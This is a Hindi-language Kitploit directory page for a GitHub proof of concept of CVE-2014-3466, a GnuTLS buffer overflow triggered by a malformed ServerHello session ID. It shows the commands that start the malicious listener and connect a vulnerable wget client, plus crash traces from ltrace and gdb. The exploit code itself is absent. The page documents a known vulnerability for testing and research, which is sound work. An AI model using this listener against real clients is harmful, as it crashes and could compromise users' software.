Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-3466_PoC — CVE-2014-3466 के लिए अवधारणा का प्रमाण (GnuTLS बफर ओवरफ्लो: सत्र आईडी लंबाई जांच) | Kitploit
उपकरण/GitHubGitHub/azet/cve-2014-3466_poc
भेद्यता विश्लेषणशोषणफज़िंगनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubazet/cve-2014-3466_poc

CVE-2014-3466_PoC

CVE-2014-3466 के लिए अवधारणा का प्रमाण (GnuTLS बफर ओवरफ्लो: सत्र आईडी लंबाई जांच)

रिपॉजिटरी देखें
1771011 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2014-3466 के लिए प्रूफ ऑफ कॉन्सेप्ट (GnuTLS बफर ओवरफ्लो: session id लंबाई जाँच)

जानकारी

देखें: https://bugzilla.redhat.com/show_bug.cgi?id=1101932

यह एक हथियारबंद एक्सप्लॉइट नहीं है।

सावधान रहें: यह python कोड बदसूरत है, मैंने काफी हद तक ServerHello को हाथ से बनाया है और python भाग पर केवल लगभग पाँच पंद्रह मिनट बिताए हैं।

इस एक्सप्लॉइट को बेझिझक सुधारें जैसा आप चाहें (यदि संभव हो तो मुझे अपडेट रखें!)।

उदाहरण

दुर्भावनापूर्ण ServerHello कोड के साथ लिसनर शुरू करें:

root@kitploit:~
$ python poc.py 4433

GnuTLS के कमजोर संस्करण से जुड़े क्लाइंट के साथ कनेक्ट करें (जैसे Debian पर wget):

root@kitploit:~
$ ldd $(which wget) 
...
	libnettle.so.4 => /usr/lib/x86_64-linux-gnu/libnettle.so.4 (0x00007fa8a026e000)
	libgnutls.so.28 => /usr/lib/x86_64-linux-gnu/libgnutls.so.28 (0x00007fa89ff5c000)
...

$ ltrace -riS -e gnutls_handshake wget -d https://localhost:4433
...
  0.000096 [0x4308a0] wget->gnutls_handshake(0xdf5380, 4, 0xa4dd30, 0x7f30f2731620 <unfinished ...>
  0.000216 [0x7f30f246b807] SYS_writev(4, 0x7fffc0b9c970, 1)    = 272
  0.000067 [0x7f30f2473a4d] SYS_recvfrom(4, 0xdf7920, 5, 0)     = 5
  0.500357 [0x7f30f2473a4d] SYS_recvfrom(4, 0xdfbad0, 250, 0)   = 250
  0.000095 [0x7f30f2e408f0] --- SIGSEGV (Segmentation fault) ---
  0.004670 [0xffffffffffffffff] +++ killed by SIGSEGV +++

$ sudo apt-get install libgnutls28-dbg
$ gdb --args wget https://localhost:4433
...
(gdb) r
...
(gdb) bt full
...
#0  0x00007ffff79548f0 in _gnutls_supported_ciphersuites (session=session@entry=0xa5e380, 
    cipher_suites=cipher_suites@entry=0x7fffffffd340 <incomplete sequence \366\245>, 
    max_cipher_suite_size=max_cipher_suite_size@entry=512) at ciphersuites.c:1311
#1  0x00007ffff78c759a in _gnutls_client_set_ciphersuite (session=session@entry=0xa5e380, 
    suite=suite@entry=0xa64b5b '\377' <repeats 111 times>) at gnutls_handshake.c:1525
#2  0x00007ffff78cae15 in _gnutls_read_server_hello (datalen=<optimized out>, 
    data=0xa64a70 "\003\001S\213\177c\301\016\035r\n\263\370\247\017\365]ieXB\200\301\373Oۚ\252\004\243\323Kq\307\310", '\377' <repeats 165 times>..., session=0xa5e380) at gnutls_handshake.c:1778
#3  _gnutls_recv_hello (session=session@entry=0xa5e380, 
    data=0xa64a70 "\003\001S\213\177c\301\016\035r\n\263\370\247\017\365]ieXB\200\301\373Oۚ\252\004\243\323Kq\307\310", '\377' <repeats 165 times>..., datalen=<optimized out>) at gnutls_handshake.c:2222
#4  0x00007ffff78cb64f in _gnutls_recv_handshake (session=session@entry=0xa5e380, 
    type=type@entry=GNUTLS_HANDSHAKE_SERVER_HELLO, optional=optional@entry=0, buf=buf@entry=0x0)
    at gnutls_handshake.c:1442
...

अभी इसे और परीक्षण करने का समय नहीं है, आनंद लें।

लाइसेंस

CC0 1.0 (https://creativecommons.org/publicdomain/zero/1.0)

टूल डाउनलोड करें